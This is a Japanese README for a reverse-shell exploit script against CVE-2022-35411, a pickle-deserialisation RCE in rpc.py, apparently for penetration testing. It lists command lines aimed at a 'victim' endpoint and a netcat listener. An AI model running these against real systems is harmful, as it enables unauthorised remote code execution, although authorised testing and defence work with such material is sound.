
CVE-2022-35411 のエクスプロイト — rpc.py (<= 0.6.0) における認証されていないRCE
これは CVE-2022-35411 向けの更新・改善されたエクスプロイトで、脆弱性のあるバージョンの rpc.py (<= 0.6.0) を標的としています。
Python の pickle 逆シリアル化を介した 認証なしのリモートコード実行 (RCE) を可能にします。
元のエクスプロイト: Elias Hohl
拡張者: x7331 - ユーザビリティ、ポータビリティ、自動化のため
この脆弱性は、rpc.py が Python の pickle モジュールを安全でない方法で使用していることに起因し、細工されたペイロードにより 認証なしで 任意のコマンドを実行できるようにします。
v0.4.2 – v0.6.0--lhost、--lport、--target、--dry-run フラグを備えた argparse に切り替え-h / --help による適切な使用ガイダンスpython3 rpc-rce.py --lhost 10.10.14.1 --lport 9001
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --dry-run
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --target http://victim.internal:65432/sayhi
3.xrequests ライブラリ (pip install requests でインストール)nc -lvnp 9001)このエクスプロイトは教育および許可されたテスト目的のみで提供されます。 所有していないシステムや明示的なテスト許可がないシステムでは使用しないでください。